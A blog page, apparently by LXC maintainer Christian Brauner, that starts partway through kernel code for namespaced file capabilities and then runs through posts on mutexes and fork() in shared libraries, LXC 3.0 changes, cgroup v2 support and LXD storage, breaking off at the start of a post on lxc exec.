* xattr to change from v2 to v3, or to fixup the v3 rootid.
*
* If all is ok, we return the new size, on error return < 0.
*/
int cap_convert_nscap(struct dentry *dentry, void **ivalue, size_t size)
{
        struct vfs_ns_cap_data *nscap;
        uid_t nsrootid;
        const struct vfs_cap_data *cap = *ivalue;
        __u32 magic, nsmagic;
        struct inode *inode = d_backing_inode(dentry);
        struct user_namespace *task_ns = current_user_ns(),
                *fs_ns = inode->i_sb->s_user_ns;
        kuid_t rootid;
        size_t newsize;

        if (!*ivalue)
                return -EINVAL;
        if (!validheader(size, cap))
                return -EINVAL;
        if (!capable_wrt_inode_uidgid(inode, CAP_SETFCAP))
                return -EPERM;
        if (size == XATTR_CAPS_SZ_2)
                if (ns_capable(inode->i_sb->s_user_ns, CAP_SETFCAP))
                        /* user is privileged, just write the v2 */
                        return size;

        rootid = rootid_from_xattr(*ivalue, size, task_ns);
        if (!uid_valid(rootid))
                return -EINVAL;

        nsrootid = from_kuid(fs_ns, rootid);
        if (nsrootid == -1)
                return -EINVAL;

        newsize = sizeof(struct vfs_ns_cap_data);
        nscap = kmalloc(newsize, GFP_ATOMIC);
        if (!nscap)
                return -ENOMEM;
        nscap->rootid = cpu_to_le32(nsrootid);
        nsmagic = VFS_CAP_REVISION_3;
        magic = le32_to_cpu(cap->magic_etc);
        if (magic & VFS_CAP_FLAGS_EFFECTIVE)
                nsmagic |= VFS_CAP_FLAGS_EFFECTIVE;
        nscap->magic_etc = cpu_to_le32(nsmagic);
        memcpy(&nscap->data, &cap->data, sizeof(__le32) * 2 * VFS_CAP_U32);

        kvfree(*ivalue);
        *ivalue = nscap;
        return newsize;
}

Conclusion

Having fcaps available in user namespaces just makes the argument to always use unprivileged containers even stronger. The Linux Containers Project is also working on a bunch of other kernel- and userspace features to improve unprivileged containers even more. Stay tuned! :)

Christian

  1. While capabilities provide a better mechanism to temporarily and selectively grant privileges to unprivileged processes they are by no means inherently safe. Setting fcaps should still be done rarely. If privilege escalation happens via suid or sgid bits or fcaps doesn’t matter in the end: it’s still a privilege escalation. 

  2. Exactly how to split up the root privilege and how exactly privileges should be implemented (e.g. should they be attached to file descriptors, should they be attached to inodes, etc.) is a good argument to have. For the sake of this article we will skip this discussion and assume the Linux implementation of POSIX capabilities. 

  3. If people are super keen and request this I can make a longer post how exactly they all relate to each other and possibly look at some of the implementation details too. 

Read more
Christian Brauner

History Of Linux Containers By Serge Hallyn

alt text

Serge Hallyn recently wrote a post outlining the actual history of containers on Linux. Worth a read!

Christian

Read more
Christian Brauner

Mutexes And fork()ing In Shared Libraries

alt text

Disclaimer

In this short - let’s call it “semi-informative rant” - I’m going to be looking at mutexes and fork() in shared libraries with threaded users. I’m going to leave out other locking primitives including semaphores and file locks which would deserve posts of their own.

The Stuff You Came Here For

A mutex is simply put one of the many synchronization primitives to protect a range of code usually referred to as “critical section” from concurrent operations. Reasons for using them are many. Examples include:

  • avoiding data corruption through multiple writers changing the same data structure at the same time
  • preventing readers from retrieving inconsistent data because a writer is changing the data structure at the same time
  • .
  • .
  • .

In its essence it is actually a pretty easy concept once you think about it. You want ownership of a resource, you want that ownership to be exclusive, you want that ownership to be limited from t_1 to t_n where you yield it. In the language of C and the pthread implementation this can be expressed in code e.g. as:

static pthread_mutex_t thread_mutex = PTHREAD_MUTEX_INITIALIZER;

static int some_function(/* parameters of relevance*/)
{
        int ret;

        ret = pthread_mutex_lock(&thread_mutex);
        if (ret != 0) {
                /* handle error */
                _exit(EXIT_FAILURE);
        }

        /* critical section */

        ret = pthread_mutex_unlock(&thread_mutex);
        if (ret != 0) {
                /* handle error */
                _exit(EXIT_FAILURE);
        }
}

Using concepts like mutexes in a shared library is always a tricky thing. What I mean by that is that if you can avoid them avoid them. For a start, mutexes usually come with a performance impact. The size of the impact varies with a couple of different parameters e.g. how long the critical section is. Depending on what you are doing these performance impacts might or might not matter to you or not even register as significant. So the performance impact argument is a difficult one to make. Usually programmers with a decent understanding of locking can find ways to minimize the impact of mutexes by toying with the layout and structure of critical sections ranging from choosing the right data structures to simply moving code out of critical sections.

There are better arguments to be made against casually using mutexes though. One is closely coupled to what type of program you’re writing. If you’re like me coming from the background of a low-level C shared library like LXC you will at some point find yourself thinking about the question whether there’s any possibility that you might be used in threaded contexts. If you can confidently answer this question with “no” you can likely stop caring and move on. If you can’t then you should think really really hard in order to avoid mutexes. The problem is a classical one and I’m not going to do a deep dive as this has been done before all over the web. What I’m alluding to is of course the mess that is fork()ing in threads. Most shared libraries that do anything interesting will likely want to fork() of helper tasks in API functions. In threaded contexts this quickly becomes a source of undefined behavior. The way fork()ing in threads works is that only the thread that called fork() gets duplicated in the child, the others are terminated. Given that fork() duplicates memory state, locking etc. all of which is shared amongst threads you quickly run into deadlocks whereby mutexes that were held in other threads are never unlocked. But it can also cause nasty undefined behavior whereby file pointers via e.g. fopen() although set up so as to be unique to each thread get corrupted due to inconsistent locking caused by e.g. dynamically allocating memory via malloc() or friends in the child process because behind the scenes in a lot of libcs mutexes are used when allocating memory.

The possibilities for bugs are endless. Another good example is the use of the exit() function to terminate child processes. The exit() function is not thread-safe since it runs standard and user-registered exit handlers from a shared resource. This is a common source of process corruption. The lesson here is of course to always use _exit() instead of exit(). The former is thread-safe and doesn’t run exit handlers. But that presupposes that you don’t care about exit handlers.

A lot of these bugs are hard to understand, debug, and - to be honest - even to explain given that they are a mixture of undefined behavior and legal thread and fork() semantics.

Running Handlers At fork()

Of course, these problems were realized early on and one way to address those is to register handlers that would be called at each fork(). In the pthread slang the name of the function to register such handlers is appropriately “pthread_atfork()”. In the case of mutexes this means you would register three handlers that would be called at different times at fork(). One right before the fork() - prepare handler - to e.g. unlock any implicitly held mutexes. One to be called after fork() processing has finished in the child - child handler - and one called after fork() processing in the parent finishes - parent handler. In the pthread implementation and for a shared library this would likely look something like this:

void process_lock(void)
{
        int ret;

	ret = pthread_mutex_lock(&thread_mutex);
        if (ret != 0)
                _exit(EXIT_FAILURE);
}

void process_unlock(void)
{
        int ret;

	ret = pthread_mutex_unlock(&thread_mutex);
        if (ret != 0)
                _exit(EXIT_FAILURE);
}

#ifdef HAVE_PTHREAD_ATFORK
__attribute__((constructor)) static void __register_atfork_handlers(void)
{
        /* Acquire lock right before fork() processing to avoid undefined
         * behavior by unlocking an unlocked mutex. Then release mutex in child
         * and parent.
         */
        pthread_atfork(process_lock, process_unlock, process_unlock);
}
#endif

While this sounds like a reasonable approach it has various and serious drawbacks:

  1. These atfork handlers come with a cost that - again depending on your program - you maybe would like to avoid.
  2. They don’t allow you to explicitly hold a lock when fork()ing in the same task depending on what handlers you are registering.

    This is straightforward. Let’s reason about the following code sequence for a minute ignoring whether holding the mutex would make sense that way:

             int ret, status;
             pid_t pid;
    
             process_lock();
             pid = fork();
             if (pid < 0)
                     return -1;
    
             if (pid == 0) {
                     /* critical section */
                     process_unlock();
                     _exit(EXIT_SUCCESS);
             }
             process_unlock();
    
     again:
             ret = waitpid(pid, &status, 0);
             if (ret < 0) {
                     if (errno == EINTR)
                             goto again;
    
                     return -1;
             }
    
             if (ret != pid)
                     goto again;
    
             if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                     return -1;
    
             return 0;
    

    No let’s add the logic caused by pthread_atfork() in there (The mutex annotation is slightly misleading but should make things a little easier to follow):

             int ret, status;
             pid_t pid;
    
             process_lock(); /* <mutex 1> (explicitly acquired) */
             process_lock(); /* <mutex 2> (implicitly acquired by prepare atfork handler) */
             pid = fork();
             if (pid < 0)
                     return -1;
    
             if (pid == 0) {
                     /* <mutex 1> held (transparently held) */
                     /* <mutex 2> held (opaquely held) */
    
                     /* critical section */
    
                     process_unlock(); /* <mutex 1> (explicitly released) */
                     process_unlock(); /* <mutex 2> (implicitly released by child atfork handler) */
                     _exit(EXIT_SUCCESS);
             }
             process_unlock(); /* mutex_2 (implicitly released by parent atfork handler) */
             process_unlock(); /* mutex_1 (explicitly released) */
    
     again:
             ret = waitpid(pid, &status, 0);
             if (ret < 0) {
                     if (errno == EINTR)
                             goto again;
    
                     return -1;
             }
    
             if (ret != pid)
                     goto again;
    
             if (!WIFEXITED(status) || WEXITSTATUS(status) != 0)
                     return -1;
    
             return 0;
    

    That doesn’t look crazy at a first glance. But let’s explicitly look at the problem:

     int ret, status;
     pid_t pid;
    
     process_lock(); /* <mutex 1> (explicitly acquired) */
     process_lock(); /* **DEADLOCK** <mutex 2> (implicitly acquired by prepare atfork handler) */
     pid = fork();
     if (pid < 0)
             return -1;
    
  3. They aren’t run when you use clone() (which obviously is a big deal for a container API like LXC). So scenarios like the following are worrying:
     /* premise: some other thread holds a mutex */
     pid_t pid;
     void *stack = alloca(/* standard page size */);
    
     /* Here atfork prepare handler needs to be run but won't. */
     pid = clone(foo, stack + /* standard page size */, SIGCHLD, NULL);
     if (pid < 0)
             return -1;
    

    The point about clone() is interestingly annoying. Since clone() is Linux specific there’s no POSIX standard that gives you a guarantee that atfork handlers are run or that they are not run. That’s up to the implementation (read “libc in question”). Currently glibc doesn’t run atfork handlers but if my fellow maintainers and I where to build consensus that it would be a great idea to change it in the next release then we would be free to do so (Don’t worry, we won’t.). So to make sure that no atfork handlers are run you need to go directly through the syscall() helper that all libcs should provide. This should give you a strong enough guarantee. That is of course an excellent solution if you don’t care about atfork handlers. However, when you do care about them you better not use clone().

  4. Running a subset of already registered atfork handlers is a royal pain.

    This relates back to the earlier point about e.g. wanting to explicitly hold a lock in a task while fork()ing. In this case you might want to exclude the handler right before the fork() that locks the mutex. If you need to do this then you’re going to have to venture into the dark dark land of function interposition. Something which is really ugly. It’s like asking how to make Horcruxes or - excuse the pun - fork()cruxes. Sure, you’ll eventually trick some low-level person into explaining it to you because it’s just such a weird and exotic thing to know or care about but that explanation will ultimately end with phrases such as “That’s all theoretical, right?” or “You’re not going to do this, right?” or - the most helpful one (honestly) - “The probability that something’s wrong with your programm’s design is higher than the probability that you really need interposition wrappers.”. In this specific case interposing pthread_atfork() would probably involve using pthread_once() calling dlsym(RTLD_NEXT, "pthread_atfork") and recording the function pointer in a global variable. Additionally, you likely want to start maintaining a jump table (essentially an array of function pointers) and register a callback wrapper around the jump table entries. You can then go on to call the callback in pthread_atfork() with different indices into the jump table. If you’re super ambitious (read “insane”) you could then have a different set of callbacks for each fork() in your program. Also, I just told you how to make a fork()crux. Let me tell you while I did this for “fun” once there’s a limit to how dirty you can feel without hating yourself. Also, this is all theoretical, right?

The list could go on and be even more detailed but the gist is: if there’s a chance that your shared library is called in threaded contexts try to come up with a design that lets you avoid mutexes and atfork handlers. On the road to LXC 3.0 we’ve recently managed to kick out all mutexes and atfork handlers of which there were very few already. This has greatly improved our confidence in threaded use cases. This is especially important since we have API consumers that call LXC from inherently threaded contexts such as the Go runtime. LXD obviously is the prime example but also the general go-lxc bindings are threaded API consumers. To be fair, we’ve never had issues before as mutexes were extremely rare in the first place but one should always remember that no locking is the best locking. :)

Addendum

2018-03-06
  • Coming back once more to the point about running atfork handlers. Atfork handlers are of course an implementation detail in the pthread and POSIX world. They are by no means a conceptual necessity when it comes to mutexes. But some standard is better than no standard when it comes to system’s design. Any decent libc implementation supporting pthread will very likely also support atfork handlers (even Bionic has gained atfork support along the way). But this immediately raises another problem as it requires programming languages on POSIX systems to go through the system’s libc when doing a fork(). If they don’t then atfork handlers won’t be run even if you call fork(). One prime example is Go. The syscall and sys/unix packages will not go through the system’s libc. They will directly do the corresponding syscall. So atfork handlers are not available when fork()ing in Go. Now, Go is a little special as it doesn’t support fork() properly in the first place because of all the reasons (and more) I outlined above.
  • Solaris:

    Let’s talk about Solaris for a minute. Before I said

    The way fork()ing in threads works is that only the thread that called fork() gets duplicated in the child, the others are terminated.

    That is an implementation detail of the pthread world. There are other implementations that don’t terminate all other threads but the calling thread. One example are Solaris Threads (or as I like to call it sthread). Actually, - hold on to your seats - sthreads support both semantics. Specifically, the sthread implementation used to have fork1() and fork() where fork1() would only duplicate the fork1()ing thread and fork() would duplicate all threads. The fork() behavior was obviously dependent on whether you linked with -lpthread or -lthread on Solaris which of course was a massive source of confusion. (Changing the behavior of functions depening on linker flags seeems like a good way into anarchy.) So Solaris started enforcing pthread semantics for fork() for both -lthread and -lpthread and added forkall() to support duplicating all threads.

Christian

Read more
Christian Brauner

alt text

Hey everyone,

This is another update about the development of LXC 3.0.

A few days ago the pam_cgfs.so pam module has been moved out of the LXCFS tree and into the LXC tree. This means LXC 3.0 will be shipping with pam_cgfs.so included. The pam module has been placed under the configure.ac flags --enable-pam and --disable-pam. By default pam_cgfs.so is disabled. Distros that are currently shipping pam_cgfs.so through LXCFS should adapt their packaging accordingly and pass --enable-pam during the configure stage of LXC.

What’s That pam_cgfs.so Pam Module Again?

Let’s take short detour (“short” cough cough). LXC has supported fully unprivileged containers since 2013 when user namespace support was merged into the kernel. (/me tips hat to Serge Hallyn and Eric Biedermann). Fully unprivileged containers are containers using user namespaces and idmappings which are run by normal (non-root) users. But let’s not talk about this let’s show it. The first asciicast shows a fully unprivileged system container running with a rather complex idmapping in a new user namespace:

asciicast

The second asciicast shows a fully unprivileged application container running without a mapping for root inside the container. In fact, it runs with just a single idmap that maps my own host uid 1000 and host gid 1000 to container uid 1000 and container gid 1000. Something which I can do without requiring any privilege at all. We’ve been doing this a long time at LXC:

asciicast

As you can see no non-standard privileges are used when setting up and running such containers. In fact, you could remove even the standard privileges all unprivileged users have available through standard system tools like newuidmap and newgidmap to setup idmappings (This is what you see in the second asciicast.). But this comes at a price, namely that cgroup management is not available for fully unprivileged containers. But we at LXC want you to be able to restrict the containers your run in the same way that the system administrator wants to restrict unprivileged users themselves. This is just good practice to prevent excessive resource consumption. What this means is that you should be free to delegate resources that you have been given by the system administrator to containers. This e.g. allows you to limit the cpu usage of the container, or the number of processes it is allowed to spawn, or the memory it is allowed to consume. But unprivileged cgroup management is not easily possible with most init system. That’s why the LXC team came up with pam_cgfs.so a long time ago to make things easier. In essence, the pam_cgfs.so pam module takes care of placing unprivileged users into writable cgroups at login. The cgroups that are supposed to be writable can be specified in the corresponding pam configuration file for your distro (probably something under /etc/pam.d). For example, if you wanted your user to be placed into a writable cgroup for all enabled cgroup hierarchies you could specify all:

session	optional	pam_cgfs.so -c all

If you only want your user to be placed into writable cgroups for the freezer, memory, unified and the named systemd hierarchy you would specify:

session	optional	pam_cgfs.so -c freezer,memory,name=systemd,unified

This would lead pam_cgfs.so to create the common cgroup user and also create a cgroup just for my own user in there. For example, my user is called chb. This would cause pam_cgfs.so to create the /sys/fs/cgroup/freezer/user/chb/0 inside the freezer hierarchy. If pam_cgfs.so finds that your init system has already placed your users inside a session specific cgroup it will be smart enough to detect it and re-use that cgroup. This is e.g. the case for the named systemd cgroup hierarchy.

chb@conventiont|~
> cat /proc/self/cgroup
12:hugetlb:/
11:devices:/user.slice
10:memory:/user.slice
9:perf_event:/
8:net_cls,net_prio:/
7:cpu,cpuacct:/user.slice
6:rdma:/
5:pids:/user.slice/user-1000.slice/session-1.scope
4:cpuset:/
3:blkio:/user.slice
2:freezer:/user/chb/0
1:name=systemd:/user.slice/user-1000.slice/session-1.scope
0::/user.slice/user-1000.slice/session-1.scope

Christian

Read more
Christian Brauner

alt text

Hey everyone,

This is another update about the development of LXC 3.0.

We are currently in the process of moving various parts of LXC out of the main LXC repository and into separate repositories.

Splitting Out The Language Bindings For Lua And Python 3

The lua language bindings will be moved into the new lua-lxc repository and the Python 3 bindings to the new python3-lxc repository. This is in line with other language bindings like Python 2 (see python2-lxc) that were always kept out of tree.

Splitting Out The Legacy Template Build System

A big portion of the LXC templates will be moved to the new lxc-templates repository. LXC used to maintain simple shell scripts to build container images from for a lot of distributions including CentOS, Fedora, ArchLinux, Ubuntu, Debian and a lot of others. While the shell scripts worked well for a long time they suffered from the problem that they were often different in terms of coding style, the arguments that they expected to be passed, and the features they supported. A lot of things these shells scripts did when creating an image is not needed any more. For example, most distros nowadays provide a custom cloud image suitable for containers and virtual machines or at least provide their own tooling to build clean new images from scratch. Another problem we saw was that security and maintenance for the scripts was not sufficient. This is why we decided to come up with a simple yet elegant replacement for the template system that would still allow users to build custom LXC and LXD container images for the distro of their choice. So the templates will be replaced by distrobuilder as the preferred way to build LXC and LXD images locally. distrobuilder is a project my colleague Thomas is currently working on. It aims to be a very simple Go project focussed on letting you easily build full system container images by either using the official cloud image if one is provided by the distro or by using the respective distro’s recommended tooling (e.g. debootstrap for Debian or pacman for ArchLinux). It aims to be declarative, using the same set of options for all distributions while having extensive validation code to ensure everything that’s downloaded is properly validated.

After this cleanup only four POSIX shell compliant templates will remain in the main LXC repository:

  • busybox

This is a very minimal template which can be used to setup a busybox container. As long as the busybox binary is found you can always built yourself a very minimal privileged or unprivileged system or application container image; no networking or any other dependencies required. All you need to do is:

lxc-create c3 -t busybox

asciicast

  • download

This template lets you download pre-built images from our image servers. This is likely what currently most users are using to create unprivileged containers.

  • local

This is a new template which consumes standard LXC and LXD system container images. A container can be created with:

lxc-create c1 -t local -- --metadata /path/to/meta.tar.xz --fstree /path/to/rootfs.tar.xz

where the --metadata flag needs to point to a file containing the metadata for the container. This is simply the standard meta.tar.xz file that comes with any pre-built LXC container image. The --fstree flag needs to point to a filesystem tree. Creating a container is then just:

asciicast

  • oci

This is the template which can be used to download and run OCI containers. Using it is as simple as:

lxc-create c2 -t oci -- --url docker://alpine

Here’s another asciicast:

asciicast

Read more
Christian Brauner

alt text

Hey everyone,

This is another update about the development of LXC 3.0.

As of yesterday the cgmanager and cgfs cgroup drivers have been removed from the codebase. In the good long tradition of all LXC projects to try our hardest to never regress our users and to clearly communicate invasive changes I wanted to take the time to explain why these two cgroup drivers have been removed in a little more detail.

CGManager

The CGManager cgroup driver relies on the upstream CGManager project which was created and written by fellow LXC and LXD maintainer Serge Hallyn back in late 2013.

The need for CGManager has been fading over the years as its main features can now be achieved in more standard and efficient ways:

  • Allowing nested containers to control their own cgroups.
  • Enabling cgroup management for unprivileged users running unprivileged containers, i.e. containers employing user namespaces and idmappings.

A first effort to deprecate CGManager happened with the inclusion of the new cgfsng cgroup driver in LXC combined with LXCFS support for creating a per-container cgroup view in userspace.

The LXCFS approach had the benefit of working with all existing software that would normally interact with cgroups through the filesystem and was also more efficient (multi-threaded) compared to the single-threaded DBUS API that CGManager was offering.

The later inclusion of the cgroup namespace in the mainline kernel finally moved all of this into the kernel, completely removing the need for a userspace solution to the problem.

CGManager itself is currently considered as deprecated and will not see any further release and so there is little point in LXC keeping support for it.

cgfs

The cgfs driver dates back from the origins of the cgroup subsystem and early integration in Linux distributions.

At that point in time, it was somewhat common for cgroup controllers to all be co-mounted or be co-mounted in big chunks, often under /dev/cgroup or /cgroup.

LXC therefore needed a lot of logic to figure out exactly what cgroup controller could be found and where. It also had to enable a number of different flags to have the then widely different controllers behave in a similar way.

Nowadays, all Linux distributions that setup cgroups will mount a split layout, typically with one controller per directory under /sys/fs/cgroup. LXC can rely on this and so knows exactly where to find all cgroup controllers without having to do complex mount table parsing and guesses.

That’s what the cgfsng driver, introduced in LXC 2.0, does with the old cgfs driver only there as a fallback. We’ve very rarely witnessed that LXC fell back to the cgfs driver and if it did it usually resulted in another failure.

As the cgfs driver is old, complex and hard to maintain and doesn’t seem to actually be handling any real world use cases, it will similarly be dropped.

More General Reasons

These are some arguments that apply to both cgroup drivers and to coding in general:

  • code blindness

    This is a general phenomenon that comes in two forms. Most developers will know what I’m talking about. It either means one has stared at a codepath for too long to really see problems anymore or it means that one has literally forgotten that a codepath actually exists. The latter is what I fear would happen with the cgfs driver. One day, I’d be looking at that code muttering “I have no memory of this place.”.

  • forgotten logic

    Reasoning about fallback/legacy codepaths is not a thing developers will have to do often. This makes it less likely for them to figure out bugs quickly. This is frustrating to users but also to developers since it increases maintenance costs significantly.

  • a well of bugs

    Legacy codepaths are a good source for bugs. This is especially true for the cgroup codepaths because the rise of the unified cgroup hierarchy changes things significantly. A lot of assumptions about cgroup management are changing and updating all three cgroup drivers would be a massive undertaking and actually pointless.

Adding New cgroup Drivers

This is a note to developers more than to users. The current cgfsng cgroup driver is not the last word. It has been adapted to be compatible with legacy cgroup hierarchies and the unified cgroup hierarchies and actually also supports hybrid cgroup layouts where some controllers are mounted into separate legacy cgroup hierarchies and others are present in the unified cgroup hierarchy. But if there is a legitimate need for someone to come up with a different cgroup driver they should be aware that the way the LXC cgroup drivers are written is modular. In essence it is close to what some languages would call an “interface”. New cgroup drivers just need to implement it. :)

Removing code that has been around and was maintained for a long time is of course hard since a lot of effort and thought has gone into it and one needs to be especially careful to not regress users that still rely on such codepaths quite heavily. But mostly it is a sign of a healthy project: within a week LXC got rid of 4,479 lines of code.

At the end, I want to say thank you to my fellow maintainers Stéphane Graber (@stgraber) and Serge Hallyn (@sehh) for all the reviews, merges, ideas, and constructive criticism over all those months. And of course, thanks to all the various contributors be it from companies like Huawei, Nvidia, Red Hat or individual contributors sending fixes all over the place. We greatly appreciate this! Keep the patches coming.

Christian & Stéphane

Read more
Christian Brauner

LXC Lands Unified cgroup Hierarchy Support

alt text

I’m excited to announce that we’ve recently added support the new unified cgroup hierarchy (or cgroup v2, cgroup2) to LXC. This includes running system containers that know about the unified cgroup hierarchy and application containers that mostly won’t really care about the cgroup layout. I’m not going to do a deep dive into the differences between legacy cgroup hierarchies and the unified cgroup hierarchy here. But if you’re interested you can watch my talk at last year’s Container Camp Sydney

**Here be dragons**: some of what I say is likely invalid by now or I've come
up with simpler solutions.

Currently existing cgroup layouts

But let’s take a quick look at the different cgroup layouts out there. Currently, there are three known cgroup layouts that a container runtime should handle:

1. Legacy cgroup hierarchies

This means that only legacy cgroup controllers are enabled and mounted into either separate hierarchies or multiple individual cgroup hierarchies. The mount layout of a legacy cgroup hierarchy has been standardized in recent years. This is mainly due to the widespread use of systemd and its opinionated way of how legacy cgroups should be mounted (Note, this is not a critique.). A standard legacy cgroup layout will usually look like this:

├─/sys/fs/cgroup                    tmpfs  tmpfs  ro,nosuid,nodev,noexec,mode=755
│ ├─/sys/fs/cgroup/systemd          cgroup cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
│ ├─/sys/fs/cgroup/devices          cgroup cgroup rw,nosuid,nodev,noexec,relatime,devices
│ ├─/sys/fs/cgroup/blkio            cgroup cgroup rw,nosuid,nodev,noexec,relatime,blkio
│ ├─/sys/fs/cgroup/cpu,cpuacct      cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
│ ├─/sys/fs/cgroup/cpuset           cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpuset,clone_children
│ ├─/sys/fs/cgroup/rdma             cgroup cgroup rw,nosuid,nodev,noexec,relatime,rdma
│ ├─/sys/fs/cgroup/hugetlb          cgroup cgroup rw,nosuid,nodev,noexec,relatime,hugetlb
│ ├─/sys/fs/cgroup/freezer          cgroup cgroup rw,nosuid,nodev,noexec,relatime,freezer
│ ├─/sys/fs/cgroup/net_cls,net_prio cgroup cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
│ ├─/sys/fs/cgroup/perf_event       cgroup cgroup rw,nosuid,nodev,noexec,relatime,perf_event
│ ├─/sys/fs/cgroup/pids             cgroup cgroup rw,nosuid,nodev,noexec,relatime,pids
│ └─/sys/fs/cgroup/memory           cgroup cgroup rw,nosuid,nodev,noexec,relatime,memory

As you can see, most controllers (e.g. devices, blkio, cpuset) are mounted into a separate cgroup hierarchy. They could be mounted differently but given that this is how most userspace programs now mount cgroups and expect cgroups to be mounted other forms of mounting them rarely need to be supported.

2. Hybrid cgroup hierarchies

The mount layout of hybrid cgroup hierarchies is mostly identical to the mount layout of the legacy cgroup hierarchies. The only difference usually being that the unified cgroup hierarchy is mounted as well. The unified cgroup hierarchy can easily be spotted by looking at the FSTYPE field in the output of the findmnt command. For legacy cgroup hierarchies it will show cgroup as value and for the unified cgroup hierarchy it will show cgroup2 as value. In the output below the third field corresponds to the FSTYPE:

├─/sys/fs/cgroup                    tmpfs  tmpfs  ro,nosuid,nodev,noexec,mode=755
│ ├─/sys/fs/cgroup/unified          cgroup cgroup2 rw,nosuid,nodev,noexec,relatime
│ ├─/sys/fs/cgroup/systemd          cgroup cgroup rw,nosuid,nodev,noexec,relatime,xattr,name=systemd
│ ├─/sys/fs/cgroup/devices          cgroup cgroup rw,nosuid,nodev,noexec,relatime,devices
│ ├─/sys/fs/cgroup/blkio            cgroup cgroup rw,nosuid,nodev,noexec,relatime,blkio
│ ├─/sys/fs/cgroup/cpu,cpuacct      cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpu,cpuacct
│ ├─/sys/fs/cgroup/cpuset           cgroup cgroup rw,nosuid,nodev,noexec,relatime,cpuset,clone_children
│ ├─/sys/fs/cgroup/rdma             cgroup cgroup rw,nosuid,nodev,noexec,relatime,rdma
│ ├─/sys/fs/cgroup/hugetlb          cgroup cgroup rw,nosuid,nodev,noexec,relatime,hugetlb
│ ├─/sys/fs/cgroup/freezer          cgroup cgroup rw,nosuid,nodev,noexec,relatime,freezer
│ ├─/sys/fs/cgroup/net_cls,net_prio cgroup cgroup rw,nosuid,nodev,noexec,relatime,net_cls,net_prio
│ ├─/sys/fs/cgroup/perf_event       cgroup cgroup rw,nosuid,nodev,noexec,relatime,perf_event
│ ├─/sys/fs/cgroup/pids             cgroup cgroup rw,nosuid,nodev,noexec,relatime,pids
│ └─/sys/fs/cgroup/memory           cgroup cgroup rw,nosuid,nodev,noexec,relatime,memory

To be honest, this is not my favorite cgroup layout since it could potentially mean that some cgroup controllers are mounted into separate legacy hierarchies while others could be enabled in the unified cgroup hierarchy. That is not difficult but annoying to handle cleanly. However, systemd usually plays nice and only supports the empty unified cgroup hierarchy in hybrid cgroup layouts.

That is to say, all controllers are mounted into legacy cgroup hierarchies and the unified hierarchy is just used by systemd to track processes, essentially replacing the old named systemd legacy cgroup hierarchy.

3. Unified cgroup hierarchy

The last option is to only mount the unified cgroup hierarchy direcly at /sys/fs/cgroup:

├─/sys/fs/cgroup cgroup cgroup2 rw,nosuid,nodev,noexec,relatime

This will likely be the near future.

LXC in current git master will support all three layouts properly including setting resource limits. So far, LXC has only provided the lxc.cgroup.* namespace to set cgroup settings on legacy cgroup hierarchies. For example, to set a limit on the number of cpus on the cpuset legacy cgroup hierarchy one would simply specify lxc.cgroup.cpuset.cpus = 1-2 in the containers config file. The idea behind this is that the lxc.cgroup.* namespace simply takes the name of a cgroup controller and a file that should be modified.

Similar to the lxc.cgroup.* legacy hierarchy namespace we have now introduced the lxc.cgroup2.* namespace which follows the exact same logic but allows to set cgroup limits on the unified hierarchy. This should allow users to easily and intuitively transition from legacy cgroup layouts to unified cgroup layouts in the near future if their distro of choice decides to do the switch.

One of the first benefactors will be LXD since we have some users running on unified layouts. But of course, the feature is available to all user of the API of the LXC shared library.

Read more
Christian Brauner

Storage management in LXD 2.15

alt text

Introduction

For a long time LXD has supported multiple storage drivers. Users could choose between zfs, btrfs, lvm, or plain directory storage pools but they could only ever use a single storage pool. A frequent feature request was to support not just a single storage pool but multiple storage pools. This way users would for example be able to maintain a zfs storage pool backed by an SSD to be used by very I/O intensive containers and another simple directory based storage pool for other containers. Luckily, this is now possible since LXD gained its own storage management API a few versions back.

Creating storage pools

A new LXD installation comes without any storage pool defined. If you run lxd init LXD will offer to create a storage pool for you. The storage pool created by lxd init will be the default storage pool on which containers are created.

asciicast

Creating further storage pools

Our client tool makes it really simple to create additional storage pools. In order to create and administer new storage pools you can use the lxc storage command. So if you wanted to create an additional btrfs storage pool on a block device /dev/sdb you would simply use lxc storage create my-btrfs btrfs source=/dev/sdb. But let’s take a look:

asciicast

Creating containers on the default storage pool

If you started from a fresh install of LXD and created a storage pool via lxd init LXD will use this pool as the default storage pool. That means if you’re doing a lxc launch images:ubuntu/xenial xen1 LXD will create a storage volume for the container’s root filesystem on this storage pool. In our examples we’ve been using my-first-zfs-pool as our default storage pool:

asciicast

Creating containers on a specific storage pool

But you can also tell lxc launch and lxc init to create a container on a specific storage pool by simply passing the -s argument. For example, if you wanted to create a new container on the my-btrfs storage pool you would do lxc launch images:ubuntu/xenial xen-on-my-btrfs -s my-btrfs:

asciicast

Creating custom storage volumes

If you need additional space for one of your containers to for example store additional data the new storage API will let you create storage volumes that can be attached to a container. This is as simple as doing lxc storage volume create my-btrfs my-custom-volume:

asciicast

Attaching custom storage volumes to containers

Of course this feature is only helpful because the storage API let’s you attach those storage volume to containers. To attach a storage volume to a container you can use lxc storage volume attach my-btrfs my-custom-volume xen1 data /opt/my/data:

asciicast

Sharing custom storage volumes between containers

By default LXD will make an attached storage volume writable by the container it is attached to. This means it will change the ownership of the storage volume to the container’s id mapping. But Storage volumes can also be attached to multiple containers at the same time. This is great for sharing data among multiple containers. However, this comes with a few restrictions. In order for a storage volume to be attached to multiple containers they must all share the same id mapping. Let’s create an additional container xen-isolated that has an isolated id mapping. This means its id mapping will be unique in this LXD instance such that no other container does have the same id mapping. Attaching the same storage volume my-custom-volume to this container will now fail:

asciicast

But let’s make xen-isolated have the same mapping as xen1 and let’s also rename it to xen2 to reflect that change. Now we can attach my-custom-volume to both xen1 and xen2 without a problem:

asciicast

Summary

The storage API is a very powerful addition to LXD. It provides a set of essential features that are helpful in dealing with a variety of problems when using containers at scale. This short introducion hopefully gave you an impression on what you can do with it. There will be more to come in the future.

Read more
Christian Brauner

lxc exec vs ssh

alt text

Recently, I’ve implemented several improvements for lxc exec. In case you didn’t know, lxc exec is LXD’s client tool that uses the LXD client api to talk to the LXD daemon and execute any program the user might want. Here is a small example of what you can do with it:

asciicast

One of our main goals is to make lxc exec feel as similar to ssh as possible since this is the standard of running commands interactively or non-interactively remotely. Making lxc exec behave nicely was tricky.

1. Handling background tasks

